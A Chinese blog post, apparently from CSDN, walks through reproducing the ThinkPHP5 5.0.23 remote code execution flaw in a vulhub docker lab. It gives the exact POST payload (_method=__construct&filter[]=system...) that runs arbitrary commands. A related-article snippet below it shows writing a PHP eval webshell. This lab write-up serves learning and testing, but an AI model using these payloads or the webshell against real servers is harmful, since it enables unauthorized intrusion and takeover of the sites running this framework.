ThinkPHP5 5.0.23 远程代码执行漏洞复现

最新推荐文章于 2024-05-29 11:35:47 发布
最新推荐文章于 2024-05-29 11:35:47 发布
阅读量444 收藏 1
点赞数
分类专栏: vulhub漏洞复现 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54786196/article/details/132623113
版权

ThinkPHP5 5.0.23 远程代码执行漏洞

0x01 形成原因

是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。 

0x02 影响的版本

5.0.23和5.1.31之前的所有版本

 0x03 启动环境

docker-compose up -d

访问靶机ip+端口号8080 

0x04 漏洞利用

使用burp抓到首页的包

改变传参方式  GET改为POST

修改参数

url参数

/index.php?s=captcha

post参数

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

id是我们执行的命令,可更换我们需要的命令 

将数据包发送出去

发现命令已经执行了

至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功

YiHua_yiye
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp5.0.23
weixin_51558394的博客
08-17 1668
thinkphp 5.0.23远程代码执行
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2454
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
thinkphp 5.0.23 rce 漏洞复现
最新发布
m0_65764670的博客
05-29 335
这里的rce是远程命令,此漏洞利用过程为访问/index.php?进入靶场文件使用docker-compose up -d拉取镜像。使用info 0​查看适用版本。设置靶机和攻击机IP。
ThinkPHP5 5.0.23 远程代码执行漏洞
EC_Carrot的博客
08-17 332
漏洞简介 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞复现 发送如下数据包即可执行id命令: POST /index.php?s=captcha HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: M
Thinkphp5.0.23远程代码执行漏洞复现
02-01 1614
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 740
vulhub thinkphp5 5.0.23 远程代码执行漏洞
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 3169
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
标题中的“thinkphp5远程执行代码漏洞修复补丁”指的是ThinkPHP5框架存在一个严重的安全问题,即远程代码执行漏洞(通常称为RCE)。在ThinkPHP5中,这个漏洞允许攻击者通过精心构造的HTTP请求,执行任意系统命令,...
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP v5.0.23核心版详解》 ThinkPHP,作为一款深受开发者喜爱的PHP框架,自诞生以来,以其简洁、高效的特性在PHP社区中占据了一席之地。尤其是ThinkPHP v5.0系列,它在继承了ThinkPHP框架一贯的优势之外,...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1838
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
漏洞复现----38、ThinkPHP5 5.0.23 远程代码执行漏洞
七天
06-29 1666
ThinkPHP 5.0.23远程代码执行漏洞
[漏洞复现]ThinkPHP5 核心类 Request 远程代码执行
wwxxee
05-20 503
ThinkPHP 5.x 核心类 Request 远程代码执行漏洞复现 影响版本: ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 ThinkPHP 5.2.0beta1 环境: vulhub-master/thinkphp/5.0.23-rce 启动docker环境之后,访问: http://ip:8080/ POC: POST /index.php?s=captcha HTTP/1.1 Host: 192.168.17.134:8080 User-Age
Thinkphp5.0.23远程代码执行漏洞
hovcfuti的博客
10-13 312
漏洞简介Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。影响版本漏洞复现在vulhub里面拉取靶场访问可以使用burp suite抓包,也可以使用hackbar浏览器插件,总之可以发post请求包就好请求文件:/index.php?
复现ThinkPHP5 5.0.23远程代码执行漏洞
m0_53042636的博客
04-12 1402
复现ThinkPHP5 5.0.23远程代码执行漏洞 burpsuite进行抓包,修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 尝试写入phpinfo 检测写入成功 写入一句话木马:echo ‘<?php eval($_POST[aaa]); ?>’ > shell.
thinkphp v5.0.23 rce
qq_43647462的博客
08-23 3518
thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架,其中在thinkphp5版本中出现了很多命令执行漏洞,本文分析采用的代码使用的是thinkphp版本v5.0.23(目的是匹配docker搭建的thinkphp环境的版本) 漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中,其中存在method方法,简单阅读发现该方法目的是为了获取当前的请求类型,因为我没有传入任何请求,所以get,post等的数组为空 其中var
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值